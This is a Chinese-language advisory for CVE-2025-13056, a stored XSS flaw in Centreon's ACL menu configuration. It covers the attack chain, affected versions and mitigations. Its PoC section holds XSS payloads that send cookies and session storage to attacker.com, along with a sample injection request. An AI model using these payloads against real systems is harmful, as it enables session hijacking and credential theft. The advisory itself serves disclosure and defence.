CVE-2025-13056 Centreon Infra Monitoring存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13056

漏洞类型

存储型XSS

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-13056是Centreon Infra Monitoring中存在的存储型跨站脚本（Stored XSS）漏洞。该漏洞位于Administration ACL菜单配置模块中，由于应用程序未能正确对用户输入进行安全过滤和转义，导致恶意JavaScript代码被永久存储在服务器端。当其他用户（包括管理员）访问受影响的页面时，存储的恶意脚本会自动执行，从而实现会话劫持、敏感信息窃取或进一步的权限提升攻击。由于该漏洞需要高权限用户才能触发，因此主要影响具有ACL配置权限的管理员账户。Centreon作为一款广泛使用的开源基础设施监控软件，在企业IT环境中部署广泛，该漏洞的存在可能对企业网络安全造成严重威胁。攻击者可以利用存储型XSS漏洞在受害者浏览器中执行任意JavaScript代码，窃取会话Cookie、冒充合法用户执行操作或植入进一步的攻击载荷。

技术细节

该漏洞属于CWE-79（跨站脚本）类别，具体为存储型XSS漏洞。在Centreon的Administration ACL菜单配置模块中，应用程序接受用户提供的输入并将其存储在数据库中，但在后续页面渲染时未对输出内容进行充分的HTML转义处理。攻击者（具有高权限的管理员或ACL配置权限的用户）可以在ACL菜单配置的相关字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>或更复杂的payload。由于输入被永久存储在服务器端，所有访问该配置页面的用户都会触发恶意代码执行。攻击者可以利用此漏洞窃取其他管理员的会话令牌，从而获得更高权限的访问权限。在CVSS 3.1评分体系中，该漏洞的向量为CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N，表明攻击复杂度低，无需用户交互，但可对机密性造成高影响。修复版本包括25.10.2、24.10.15和24.04.19，用户应尽快升级以消除安全风险。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标Centreon版本，确认其属于受影响版本范围（25.10.0-25.10.2、24.10.0-24.10.15、24.04.0-24.04.19）

STEP 2

获取高权限访问

攻击者需要获得具有ACL配置权限的管理员账户访问权限，或通过其他漏洞提升至相应权限级别

STEP 3

注入恶意代码

在Administration > ACL > Menu Administration模块中，攻击者在菜单名称、描述或注释字段中注入恶意JavaScript代码

STEP 4

持久化存储

恶意payload被存储在Centreon数据库中，由于是存储型XSS，代码会永久存在于系统中直到被清除

STEP 5

触发执行

当其他管理员或用户访问ACL菜单配置页面时，浏览器会解析并执行存储的恶意JavaScript代码

STEP 6

数据窃取/会话劫持

恶意脚本窃取用户会话Cookie、凭据或其他敏感信息，并将其发送到攻击者控制的服务器

STEP 7

权限提升/横向移动

攻击者利用窃取的会话信息冒充合法管理员，执行未授权操作或进一步渗透内网系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13056 Stored XSS PoC for Centreon ACL Configuration
// Target: Centreon Infra Monitoring < 25.10.2, < 24.10.15, < 24.04.19
// Attack Vector: Inject malicious JavaScript in ACL menu configuration

// Step 1: Login as high-privilege user with ACL configuration access
// Step 2: Navigate to Administration > ACL > Menu Administration
// Step 3: Create or edit a menu configuration entry
// Step 4: Inject XSS payload in vulnerable field (e.g., menu name or description)

const xssPayload = `
<img src=x onerror="
  // Steal session cookies
  fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie))
">
`;

// Alternative payload - Session hijacking
const sessionHijackPayload = `
<script>
  // Capture admin credentials or session
  document.addEventListener('DOMContentLoaded', function() {
    var sessionData = {
      cookies: document.cookie,
      localStorage: localStorage.getItem('centreon_user'),
      sessionStorage: sessionStorage.getItem('centreon_session'),
      userAgent: navigator.userAgent
    };
    
    // Exfiltrate data to attacker-controlled server
    fetch('https://attacker.com/exfiltrate', {
      method: 'POST',
      headers: {'Content-Type': 'application/json'},
      body: JSON.stringify(sessionData)
    });
  });
</script>
`;

// Example HTTP request to inject payload
const injectRequest = {
  method: 'POST',
  path: '/centreon/api/latest/administration/acl/menu',
  body: {
    'menu_name': '<script>alert("XSS")</script>',
    'menu_description': xssPayload,
    'menu_comment': sessionHijackPayload
  }
};

console.log('[+] XSS Payload prepared for CVE-2025-13056');
console.log('[+] Payload will be stored and executed for all users viewing the ACL menu');

影响范围

Centreon Infra Monitoring 25.10.0 <= version < 25.10.2

Centreon Infra Monitoring 24.10.0 <= version < 24.10.15

Centreon Infra Monitoring 24.04.0 <= version < 24.04.19

防御指南

临时缓解措施

在无法立即进行版本升级的情况下，可采取以下临时缓解措施：1）禁用或限制ACL菜单配置功能的使用，仅允许受信任的管理员访问；2）实施严格的输入过滤规则，对ACL配置字段中的特殊字符（如<、>、"、'、/等）进行过滤或转义；3）启用Web应用防火墙规则检测XSS攻击特征；4）对所有访问ACL配置页面的请求实施额外的监控和日志记录，以便及时发现异常行为；5）考虑临时关闭Centreon的Administration ACL模块，待正式补丁发布后再重新启用。建议尽快安排计划进行版本升级以彻底消除该安全风险。